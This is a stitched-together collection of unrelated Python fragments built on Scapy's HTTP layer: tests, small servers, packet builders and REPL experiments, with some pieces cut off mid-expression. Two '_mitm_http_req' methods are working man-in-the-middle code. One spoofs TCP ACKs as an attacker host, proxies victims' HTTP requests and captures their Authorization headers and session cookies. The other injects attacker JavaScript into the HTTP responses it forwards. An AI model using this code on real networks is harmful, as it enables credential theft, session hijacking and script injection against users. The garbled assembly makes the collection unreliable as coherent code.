def test_from_datasources():
packets_1 = [
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com")
]
packets_2 = [
# HTTP Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com"),
# DNS Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) /
DNS(rd=1,
qd=DNSQR(qtype="A", qname="google.com"),
an=DNSRR(rdata="123.0.0.1")),
# TCP Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=80, dport=5355),
]
nx = NetworkX.from_datasources([
packets_to_datasource_events(packets)
for packets in [packets_1, packets_2]
])
# Make the graph
nx.graph()
assert not nx.is_empty()
def handle(self, data):
shutdown = False
http = HTTP(data)
if http.name == 'HTTP 1':
httpr = http.payload
if httpr.name == 'HTTP Request':
print()
print("=== Request ===")
print(httpr.summary())
payload = ""
if httpr.Path.decode('ascii') == "/Metrics":
with self.lock:
payload = dumps(dict(self.faasMetrics))
# elif httpr.Path.decode('ascii') == "/Shutdown":
# payload = str(time())
# shutdown = True
elif httpr.Path.decode('ascii') == "/Run":
payload = str(time())
else:
print("Bad Path")
return bytes(HTTP() / HTTPResponse(Status_Code='200') /
Raw(load=payload)), shutdown
else:
return bytes(HTTP / HTTPResponse(Status_Code='405')), shutdown
else:
return bytes(HTTP / HTTPResponse(Status_Code='400')), shutdown
def _mitm_http_req(self, http_req):
"""do proxy http request, intercept auth and cookie info
return (auth, cookie[session]) in bytes"""
# response ack first
l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP(
src=self.http_ip, dst=self.client_ip)
ack = TCP(dport=http_req[TCP].sport,
sport=http_req[TCP].dport,
flags="A",
seq=http_req.ack,
ack=http_req.seq + 1)
sendp(l2_l3 / ack, verbose=False)
# send proxy request
ip = http_req[HTTPRequest].Host.decode(encoding="ascii")
port = http_req[TCP].dport
proxy_http_req = HTTP() / http_req[HTTPRequest]
http_res = TCP_client.tcplink(proto=HTTP, ip=ip,
port=port).sr1(proxy_http_req,
verbose=False)
# forward http response to client
res = http_res[HTTP] / http_res[HTTPResponse]
sendp(l2_l3 / ack / res, verbose=False)
# return
authorization = http_req[HTTPRequest].Authorization
cookie = res[HTTPResponse].Set_Cookie
return authorization, cookie
def __init__(self, port, rprob=0.07):
"""Constructor"""
self.s = RstegSocket(rprob=rprob, sport=port)
self.s.bind('', port)
# Load in memory the html responses
index_data = open('./index.html', 'rb').read()
upload_data = open('./upload.html', 'rb').read()
# Load the HTTP Response data structure
self.res = HTTP() / HTTPResponse()
self.index = HTTP() / HTTPResponse(Content_Length=str(
len(index_data)).encode(), ) / index_data
self.upload = HTTP() / HTTPResponse(Content_Length=str(
len(upload_data)).encode(), ) / upload_data
self.not_found = HTTP() / HTTPResponse(Status_Code=b'404',
Reason_Phrase=b'Not Found')
def packet2p0f(pkt):
"""
Returns a p0f signature of the packet, and the direction.
Raises TypeError if the packet isn't valid for p0f
"""
pkt = validate_packet(pkt)
pkt = pkt.__class__(raw(pkt))
if pkt[TCP].flags.S:
if pkt[TCP].flags.A:
direction = "response"
else:
direction = "request"
sig = TCP_Signature.from_packet(pkt)
elif pkt[TCP].payload:
# XXX: guess_payload_class doesn't use any class related attributes
pclass = HTTP().guess_payload_class(raw(pkt[TCP].payload))
if pclass == HTTPRequest:
direction = "request"
elif pclass == HTTPResponse:
direction = "response"
else:
raise TypeError("Not an HTTP payload")
sig = HTTP_Signature.from_packet(pkt)
else:
raise TypeError("Not a SYN, SYN/ACK, or HTTP packet")
return sig, direction
def HTTP_ntlm_negotiate(ntlm_negotiate):
"""Create an HTTP NTLM negotiate packet from an NTLM_NEGOTIATE message"""
assert isinstance(ntlm_negotiate, NTLM_NEGOTIATE)
from scapy.layers.http import HTTP, HTTPRequest
return HTTP() / HTTPRequest(
Authorization=b"NTLM " + bytes_base64(bytes(ntlm_negotiate))
)
def send(self, op_type, version, **kwargs):
"""
Method to send and receive ipp request
"""
if len(kwargs) <= 0:
if op_type == "Get-Jobs":
kwargs = get_jobs(self.host)
else:
print(f"No default templates is available for {op_type} !!!")
sys.exit()
self.form_ipp_packet(op_type=op_type, version=version, **kwargs)
InternetPrintingProtocol.add_fields(self.ipp_field)
IPP_HTTP_REQUESTS['Content_Length'] = bytes(
str(len(InternetPrintingProtocol())), "utf-8")
IPP_HTTP_REQUESTS['Host'] = bytes(f"{self.host}:{self.port}", "utf-8")
IPP_HTTP_REQUESTS['Path'] = bytes(self.path, "utf-8")
ipp_request = HTTP() / HTTPRequest(
**IPP_HTTP_REQUESTS) / InternetPrintingProtocol()
self.my_stream.sr(ipp_request, timeout=5, verbose=0)
return InternetPrintingProtocol().get_results()
def create_get_request(host, path):
get_req = HTTP() / HTTPRequest(Accept_Encoding=b'gzip, deflate',
Cache_Control=b'no-cache',
Connection=b'keep-alive',
Host=host.encode(),
Path=path.encode(),
Pragma=b'no-cache')
return get_req
def handle(self, data):
http = HTTP(data)
if http.name == 'HTTP 1':
httpr = http.payload
if httpr.name == 'HTTP Request':
s = httpr.Path.decode('ascii')
n = s.rindex("/")
faasIP = self.decide(s[n + 1:])
print()
print("=== Redirection ===")
print(httpr.summary(), " --> ", faasIP)
if faasIP:
global response
if httpr.Method.decode('ascii') == 'POST':
response = post(
url="http://" + faasIP + ':' + str(self.Port) +
httpr.Path.decode('ascii'),
data=httpr.payload.load.decode('ascii'))
elif http.Method.decode('ascii') == 'GET':
response = get(url="http://" + faasIP + ':' +
str(self.Port) +
httpr.Path.decode('ascii'),
data=httpr.payload.load.decode('ascii'))
else:
print("Other request method")
response = None
if response:
return bytes(
HTTP() /
HTTPResponse(Status_Code=str(response.status_code))
/ Raw(load=response.content.decode('ascii')))
else:
return bytes(HTTP / HTTPResponse(Status_Code='405') /
Raw())
else:
return bytes(HTTP / HTTPResponse(Status_Code='400') /
Raw())
else:
return bytes(HTTP / HTTPResponse(Status_Code='400') / Raw())
else:
return bytes(HTTP / HTTPResponse(Status_Code='400') / Raw())
def create_post_request(host, path, data, content_type):
post_req = HTTP() / HTTPRequest(
Method=b'POST',
Path=path.encode(),
Host=host.encode(),
Connection=b'keep-alive',
Content_Length=str(len(data)).encode(),
Content_Type=content_type.encode()) / data
return post_req
def _mitm_http_req(self, http_req):
"""do proxy http request and response with injected payload"""
# response ack first
l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP(
src=self.http_ip, dst=self.client_ip)
ack = TCP(dport=http_req[TCP].sport,
sport=http_req[TCP].dport,
flags="A",
seq=http_req.ack,
ack=http_req.seq + 1)
sendp(l2_l3 / ack, verbose=False)
# send proxy request and get response
ip = http_req[HTTPRequest].Host.decode(encoding="ascii")
port = http_req[TCP].dport
proxy_http_req = HTTP() / http_req[HTTPRequest]
http_res = TCP_client.tcplink(proto=HTTP, ip=ip,
port=port).sr1(proxy_http_req,
verbose=False)
# inject js into payload and forward packets recursively
def rec_forward_load(load,
seq,
template_p,
total_len=None,
window_size=167):
total_len = total_len if total_len is not None else len(load)
l2 = Ether(src=self.attacker_mac, dst=self.client_mac)
l3 = IP(src=self.http_ip, dst=self.client_ip)
if len(load) > window_size:
this_load, rest_load = load[:window_size], load[window_size:]
l4 = TCP(dport=http_req[TCP].sport,
flags="PA",
seq=seq,
ack=http_req.seq + 1)
p = l2 / l3 / l4 / template_p
p = MyUtil.set_load(p, this_load, rest_len=len(rest_load) -
2) # I don't know why -2
sendp(p, verbose=False)
rec_forward_load(load=rest_load,
seq=seq + window_size,
template_p=template_p,
total_len=total_len,
window_size=window_size)
else: # last packet
l4 = TCP(dport=http_req[TCP].sport,
flags="FA",
seq=seq,
ack=http_req.seq + 1)
p = l2 / l3 / l4 / template_p
p = MyUtil.set_load(p, load, rest_len=0)
sendp(p, verbose=False)
new_load = http_res[Raw].load.replace(
b"</body>",
f"<script>{self.script}</script></body>".encode("ascii"))
rec_forward_load(load=new_load, seq=http_req.ack, template_p=http_res)
def construct_packet(addr, input):
if input == None:
return
r_input = binary_converter(input)
if r_input == None:
return
r_input = binary_to_unicode(r_input)
if r_input == None:
return
packet = IP(dst=addr[0]) / HTTP() / HTTPRequest(Referer=r_input)
return bytes(packet)
def handle(self, data, address):
shutdown = False
http = HTTP(data)
if http.name == 'HTTP 1':
httpr = http.payload
if httpr.name == 'HTTP Request':
print()
print("=== Request ===")
print(httpr.summary(), address)
payload = ""
if httpr.Method.decode('ascii') == 'POST':
with self.lock:
self.hosts[address] = time()
elif httpr.Method.decode('ascii') == 'GET':
if httpr.Path.decode('ascii') == "/Hosts":
with self.lock:
for host in self.hosts.keys():
payload += host + ' '
# elif httpr.Path.decode('ascii') == "/Shutdown":
# payload = str(time())
# shutdown = True
else:
payload = str(time())
else:
print(">>> Other request method")
return bytes(HTTP() / HTTPResponse(Status_Code='200') /
Raw(load=payload)), shutdown
else:
return bytes(HTTP / HTTPResponse(Status_Code='405')), shutdown
else:
return bytes(HTTP / HTTPResponse(Status_Code='400')), shutdown
def scapy_packet(addr, input):
if input == None:
return None
r_input = binary_converter(input)
if r_input == None:
return None
# print(r_input)
r_input = binary_to_unicode(r_input)
if r_input == None:
return None
# print(r_input)
packet = IP(dst=addr[0]) / HTTP() / HTTPRequest(Referer=r_input)
return packet
def cons_HTTP():
print("in ", cons_HTTP.__name__, " #######")
load_layer("http")
req = HTTP()/HTTPRequest(
Host=b'www.baidu.com',
User_Agent=b'curl/7.64.1',
Accept=b'*/*'
)
a = TCP_client.tcplink(HTTP, "www.baidu.com", 80)
answser = a.sr1(req, retry=3, timeout=1) ###maybe MISS response
a.close()
if answser is not None:
print(answser.load)
print()
print()
def main():
parser = ArgumentParser()
parser.add_argument('--content-type',
default='application/cbor',
help='The request content-type header')
parser.add_argument(
'--infile',
default='-',
help='The diagnostic text input file, or "-" for stdin')
parser.add_argument('--outfile',
default='-',
help='The PCAP output file, or "-" for stdout')
parser.add_argument('--intype',
default='cbordiag',
choices=['cbordiag', 'raw'],
help='The input data type.')
args = parser.parse_args()
# First get the CBOR data itself
infile_name = args.infile.strip()
if infile_name != '-':
infile = open(infile_name, 'rb')
else:
infile = sys.stdin.buffer
if args.intype == 'raw':
cbordata = infile.read()
elif args.intype == 'cbordiag':
cbordata = check_output('diag2cbor.rb', stdin=infile)
# Now synthesize an HTTP request with that body
req = HTTPRequest(
Method='POST',
Host='example.com',
User_Agent='scapy',
Content_Type=args.content_type,
Content_Length=str(len(cbordata)),
) / Raw(cbordata)
# Write the request directly into pcap
outfile_name = args.outfile.strip()
if outfile_name != '-':
outfile = open(outfile_name, 'wb')
else:
outfile = sys.stdout.buffer
pkt = Ether() / IP() / TCP() / HTTP() / req
wrpcap(outfile, pkt)
def test_multiple_packets():
packets = [
# HTTP Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com"),
# DNS Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) /
DNS(rd=1,
qd=DNSQR(qtype="A", qname="google.com"),
an=DNSRR(rdata="123.0.0.1")),
# TCP Packet
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=80, dport=5355),
]
events = list(packets_to_datasource_events(packets).events())
assert len(events) == 3
assert [e["event_type"] for e in events] == ["HTTPRequest", "DNS", "TCP"]
def test_single_http_packet():
packets = [
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com")
]
events = list(packets_to_datasource_events(packets).events())
assert len(events) == 1
assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab"
assert events[0]["dst_mac"] == "12:12:12:12:12:12"
assert events[0]["src_ip"] == "127.0.0.1"
assert events[0]["dst_ip"] == "192.168.1.1"
assert events[0]["sport"] == 12345
assert events[0]["dport"] == 80
assert events[0]["http_method"] == "GET"
assert events[0]["uri"] == "/foo"
assert events[0]["http_dest"] == "https://google.com"
assert events[0]["event_type"] == "HTTPRequest"
# or even its own.
random.seed(datetime.now())
# default package to execute "rosparam get /rosdistro"
package_rosparam_get_rosdistro = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
from scapy.all import sr1,IP,ICMP,TCPSession,sr,srp,srp1,send,sendp,sendpfast,RandShort
from scapy.layers.inet import TCP_client,TCP,Ether,UDP
ans,unans = sr(IP(dst="8.8.8.8")/TCP(dport=[80,443],flags="S"),timeout=1)
p=sr1(IP(dst='8.8.8.8')/ICMP())
if p:
p.show()
dir(scapy.layers.http)
HTTPRequest().show()
HTTPResponse().show()
load_layer("http")
req = HTTP()/HTTPRequest(
Accept_Encoding=b'gzip, deflate',
Cache_Control=b'no-cache',
Connection=b'keep-alive',
Host=b'www.secdev.org',
Pragma=b'no-cache'
)
a = TCP_client.tcplink(HTTP, "secdev.org", 80)
answser = a.sr1(req,timeout=3)
a.close()
with open("www.secdev.org.html", "wb") as file:
file.write(answser.load)
load_layer("http")
http_request("secdev.org", "/", display=True,timeout=4)
